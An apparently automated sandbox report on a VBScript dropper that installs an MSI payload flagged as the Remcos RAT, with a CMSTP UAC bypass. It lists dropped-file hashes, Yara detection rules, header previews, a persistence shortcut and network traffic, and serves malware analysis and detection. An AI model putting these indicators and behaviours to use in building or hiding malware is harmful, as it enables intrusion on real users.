                                                                                                            SHA-256:8E35C2CD3BF6641BDB0E2050B76932CBB2E6034A0DDACC1D9BEA82A6BA57F7CF
                                                                                                            SHA-512:2E96772232487FB3A058D58F2C310023E07E4017C94D56CC5FAE4B54B44605F42A75B0B1F358991F8C6CBE9B68B64E5B2A09D0AD23FCAC07EE9A9198A745E1D5
                                                                                                            Malicious:false
                                                                                                            Preview:q
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):500736
                                                                                                            Entropy (8bit):6.582878001257931
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:w/7iPrcL3ArwhBq7Kjsn9iHGXg0lwGS9MNNhdFvPxps9gsAOZZAAXgc7S7ovz:w/uPq3AfK496Gw0lwGXN3pvs/ZA58vz
                                                                                                            MD5:16EC8B91B5461B1C810DCCDEAD6DE87F
                                                                                                            SHA1:FC9F07EE1F1BC5CC09F290B935BECC85223970E7
                                                                                                            SHA-256:C71E4D86B24B883F8DAF83CD2E3F689283185CF1DB4BDEFBEE213E50550CF968
                                                                                                            SHA-512:8EBD977810D7AD3AB051EC9F3BA18DB48FAE5FA2399ABD7E4C202C4551167B1394FACA42789AE0FEF636F90E1E29F69541009671BB45D13E4A8986D480889997
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: unknown
                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: unknown
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\yljutqdulam, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..~........PE..L....TCX.................r..........=I............@..........................@...........................................................J.......................;..@...8...........................x...@............................................text....p.......r.................. ..`.rdata...y.......z...v..............@..@.data...4]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....J.......L..................@..@.reloc...;.......<...P..............@..Bumlwqq... ... ......................@...........................................................................................................................................................................
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Updwork.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 29 23:25:30 2024, mtime=Fri Nov 29 23:25:30 2024, atime=Thu Nov 28 17:56:30 2024, length=506816, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):857
                                                                                                            Entropy (8bit):4.554210321205124
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:86n01xcVeresXl+yiwiScgxwUFjEjAANp+Ub9Yw/wUCpyKfpoKf9mV:8Q0HpCwYgxw4QAM59Yw/wHpdfBf9m
                                                                                                            MD5:F89088874F88C841C18BEE95F15F7B2D
                                                                                                            SHA1:822052F04F2A05D67CDE12745ED4619D0E4F6DD0
                                                                                                            SHA-256:93A3941DA217BDCFF7C0228151ABFF6353EADD571337A550840F6A65E998383A
                                                                                                            SHA-512:8492B200AB8F663957AE7FE18A4C65BF3B15A162D4B1FE21A95857D5AC7970B2DEC338B6BB3CE75E84EA1A4592A0213912A70FA0B28CC9CEAEE4E1F6D74C4792
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F.... ..`..\.B..`..\.B.....<.A..........................k....P.O. .:i.....+00.../C:\...................`.1.....~Y0.. PROGRA~3..H......O.I~Y0.....g.....................# ..P.r.o.g.r.a.m.D.a.t.a.....h.1.....~Y0.. RAFTEL~1..P......~Y0.~Y0............................!..R.a.f.t.e.l.i.b.e.G.a.s.r.s.s.....t.2.....|Y.. RAFTEL~1.EXE..X......~Y0.~Y0...............................R.a.f.t.e.l.i.b.e.G.a.s.r.s.s...e.x.e.......a...............-.......`..............P.....C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe..J.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.R.a.f.t.e.l.i.b.e.G.a.s.r.s.s.\.R.a.f.t.e.l.i.b.e.G.a.s.r.s.s...e.x.e.`.......X.......571345...........hT..CrF.f4... ..]}......-...-$..hT..CrF.f4... ..]}......-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):570784
                                                                                                            Entropy (8bit):6.45015034296188
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
                                                                                                            MD5:2C9C51AC508570303C6D46C0571EA3A1
                                                                                                            SHA1:E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
                                                                                                            SHA-256:FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
                                                                                                            SHA-512:DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3815
                                                                                                            Entropy (8bit):5.25424641458202
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:WTYT2hTD3bQ/6hrAHec2h3h3hpiiyrrT67sOjKpcF6:WTo8TDrDrAHIxxOpcF6
                                                                                                            MD5:83F4E467753C1B23BE4D80E223285AC7
                                                                                                            SHA1:75259894EB4AF02E446EF4B08618EFC8684AF46A
                                                                                                            SHA-256:E69FFFEC66E23B357EC72C4E0D9BF3CC636C718453A9197BF0383F1F3175972F
                                                                                                            SHA-512:56956D92190364BFC7D60DA307325E7A5390C12AF8B8D2C983CB93D87EA771C8CB8767263B906B48F51B9E927FD37A8864C33B13D91B20E192E88AF5B665AEF5
                                                                                                            Malicious:false
                                                                                                            Preview:...@IXOS.@.....@5.}Y.@.....@.....@.....@.....@.....@......&.{BB2F3E18-3F04-450F-B8B5-60A9665181A8}..dermys..Slf.msi.@.....@.....@.....@........&.{02DCC2F2-67E6-46B0-92E0-2CB394AB055F}.....@.....@.....@.....@.......@.....@.....@.......@......dermys......Rollback..Annulation de l'action: ....RollbackCleanup%.Effacement des fichiers de sauvegarde..Fichier: [1]...@.......@........ProcessComponents9.M.i.s.e. ... .j.o.u.r. .d.e.s. .i.n.f.o.r.m.a.t.i.o.n. .d.'.e.n.r.e.g.i.s.t.r.e.m.e.n.t. .d.u. .c.o.m.p.o.s.a.n.t....@.....@.....@.]....&.{0E0C50F8-B210-4B4D-91B3-D1FB7FE78CFA}0.C:\Users\user\AppData\Roaming\Germys\dermys\.@.......@.....@.....@......&.{BA5264B4-F3AE-4F52-99B5-3968C5A81E6A}".01:\Software\Germys\dermys\Version.@.......@.....@.....@......&.{6B83B1C9-08BB-4AEA-A6A8-8797A2558FDB}$.C:\Users\user\AppData\Local\All\.@.......@.....@.....@......&.{F74533CE-84F1-400D-ABB3-76E2590644A5}).C:\Users\user\AppData\Local\All\Form\.@.......@.....@.....@......&.{80922E60-CA5C-47B6-8B4C-
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {02DCC2F2-67E6-46B0-92E0-2CB394AB055F}, Number of Words: 10, Subject: dermys, Author: Germys, Name of Creating Application: dermys, Template: ;1036, Comments: Cette base de donnes d'installation contient le code et les donnes ncessaires l'installation de dermys., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3581440
                                                                                                            Entropy (8bit):7.741428780274999
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:49152:vm5X8r6F5mCmR+juZZZL+H9IyKficUAG595WpZsNAaudSIuvLZ8:co6wZLSIX6cZGZWUNAaudgZ
                                                                                                            MD5:6F92F923D8F87AFE5FE757FF2FF56951
                                                                                                            SHA1:44780713A7026B9B0FF3CADEAFFACB3CC3584ECA
                                                                                                            SHA-256:6ED0C218B751EC93293B5922E783B7A9B147A3C7CD6070022CD707050108D321
                                                                                                            SHA-512:100DF666E8C5B4C2E21DE703FE7210A41DAEDF1480E1FE4B7388AA63DD51ECCBE46E141A275EF61061C97CF3CD268A129CFD5FA0E290E4525B07915789713F0A
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...................7...................................H.......d.......q.......................................r.......T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y.......................................................................................................................................................................................................................................................#.../........................................................................................... ...!..."...-.......%...&...'...(...)...*...+...,.......0...5...B...1...2...3...4...7...6...>...8...9...:...;...<...=...@...?...A...........C...D...E...F...G...........J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.5628784200137806
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:28PhPuRc06WXJKFT5rS6MGczSyAEbCyN96uSiOSIT:JhP1BFT+Gcz4wCa6WO
                                                                                                            MD5:4B21D53B3C9EAC3FD4FC46431A7D2114
                                                                                                            SHA1:CCB19A62D1A0C554D52524D764356CEDE0D6E3A2
                                                                                                            SHA-256:F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD
                                                                                                            SHA-512:C9F2DBA413344211AA29BBBC8E0E3B73AD7B3495AAC95BA47F79A246898CE2FE7A63EB9DAC9475FFA53DDCDDD941CB1087FECC061E0947BF1B7066BF5FC7218D
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.5628784200137806
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:28PhPuRc06WXJKFT5rS6MGczSyAEbCyN96uSiOSIT:JhP1BFT+Gcz4wCa6WO
                                                                                                            MD5:4B21D53B3C9EAC3FD4FC46431A7D2114
                                                                                                            SHA1:CCB19A62D1A0C554D52524D764356CEDE0D6E3A2
                                                                                                            SHA-256:F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD
                                                                                                            SHA-512:C9F2DBA413344211AA29BBBC8E0E3B73AD7B3495AAC95BA47F79A246898CE2FE7A63EB9DAC9475FFA53DDCDDD941CB1087FECC061E0947BF1B7066BF5FC7218D
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.2530905118399702
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zIXuSrO+gFXJ7T5KS6MGczSyAEbCyN96uSiOSIT:EXF6jTPGcz4wCa6WO
                                                                                                            MD5:EAA8D1CE7E1DE885E0407E7C4321CABE
                                                                                                            SHA1:132C769D017A5A22B073DAFAB186B6BE3D9B357E
                                                                                                            SHA-256:DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974
                                                                                                            SHA-512:705C4FC98BD6AFB4460D346308A1B9CB009B6D1A411393EB67800896A3B3A0DE0C681C5E5B1A1B96B4445E353E02360F425C655DE198B1022B4171072EDF0389
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):73728
                                                                                                            Entropy (8bit):0.13704056501880332
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:sTxkZipVknkZipVkXAEVkyjCyNV3+bpGOsGgSi+4woplY+42SDWWF:sTkSTSyAEbCyN96uSiHs2S6M
                                                                                                            MD5:8225023868D0D5749ED47B405A76831A
                                                                                                            SHA1:A91A62CB3CF6BA35A2D0CFCB916C0A6E52DC7BB2
                                                                                                            SHA-256:70E34C3B77607DE89F56822B0F2AE5EA91DED6C00C776BE213EE5349E7745E51
                                                                                                            SHA-512:561EA2C21FC400777A6F9CF77437A52227305D696F05523260713174EFB74DB2EB037194D2BDB5E33AA69A63375E3E1F1F4038B8D4FE102D2B22BFB6A76AFBFA
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.5628784200137806
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:28PhPuRc06WXJKFT5rS6MGczSyAEbCyN96uSiOSIT:JhP1BFT+Gcz4wCa6WO
                                                                                                            MD5:4B21D53B3C9EAC3FD4FC46431A7D2114
                                                                                                            SHA1:CCB19A62D1A0C554D52524D764356CEDE0D6E3A2
                                                                                                            SHA-256:F1CD201632FE1CE8FEEFC3B5A40A16FBCB84A79B78BCFFB68D5DC27908234CDD
                                                                                                            SHA-512:C9F2DBA413344211AA29BBBC8E0E3B73AD7B3495AAC95BA47F79A246898CE2FE7A63EB9DAC9475FFA53DDCDDD941CB1087FECC061E0947BF1B7066BF5FC7218D
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.2530905118399702
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zIXuSrO+gFXJ7T5KS6MGczSyAEbCyN96uSiOSIT:EXF6jTPGcz4wCa6WO
                                                                                                            MD5:EAA8D1CE7E1DE885E0407E7C4321CABE
                                                                                                            SHA1:132C769D017A5A22B073DAFAB186B6BE3D9B357E
                                                                                                            SHA-256:DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974
                                                                                                            SHA-512:705C4FC98BD6AFB4460D346308A1B9CB009B6D1A411393EB67800896A3B3A0DE0C681C5E5B1A1B96B4445E353E02360F425C655DE198B1022B4171072EDF0389
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.2530905118399702
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zIXuSrO+gFXJ7T5KS6MGczSyAEbCyN96uSiOSIT:EXF6jTPGcz4wCa6WO
                                                                                                            MD5:EAA8D1CE7E1DE885E0407E7C4321CABE
                                                                                                            SHA1:132C769D017A5A22B073DAFAB186B6BE3D9B357E
                                                                                                            SHA-256:DC504DC8A51A690EF616E3332C62946C849B1FD4F3E859484FEA772333CF6974
                                                                                                            SHA-512:705C4FC98BD6AFB4460D346308A1B9CB009B6D1A411393EB67800896A3B3A0DE0C681C5E5B1A1B96B4445E353E02360F425C655DE198B1022B4171072EDF0389
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            File type:ASCII text, with CRLF line terminators
                                                                                                            Entropy (8bit):4.9168174191063745
                                                                                                            TrID:
                                                                                                              File name:secondaryTask.vbs
                                                                                                              File size:876 bytes
                                                                                                              MD5:183d51767fe58e2bd256688315d25709
                                                                                                              SHA1:2c0f959b61081a10a085ad8e8f8741a69e2d9934
                                                                                                              SHA256:23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
                                                                                                              SHA512:f5c06582247afab9d6f3c60b62334ed93d4ee7e447b0299e8959dbec5620def6fb1a8ea17e3c3537b4e7ff2c6661b5396e78e1688ec6267076b01068572e76ed
                                                                                                              SSDEEP:24:PAilGdehX66xyIpDkJbJ4CQjamgX3TX83qpz/7:P9GaZpDkNSKZzD
                                                                                                              TLSH:6B116F4D8EBE8673EDB403F255FF31848BCC640180A9541F25A7A8342681C0587676DF
                                                                                                              File Content Preview:Option Explicit....Dim WshShell, part1, part2_1, part2_2, part2_3, part2_4, part3, part4, installCommand....' Create instances of the required objects..Set WshShell = CreateObject("WScript.Shell")....' Sleep for 5 seconds before running the installation..
                                                                                                              Icon Hash:68d69b8f86ab9a86
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 30, 2024 01:25:00.192768097 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:00.192809105 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:00.192886114 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:00.194375992 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:00.194389105 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:01.894823074 CET4434970720.233.83.145192.168.2.6
                                                                                                              Nov 30, 2024 01:25:01.894910097 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:01.986743927 CET49707443192.168.2.620.233.83.145
                                                                                                              Nov 30, 2024 01:25:01.986778021 CET4434970720.233.83.145192.168.2.6
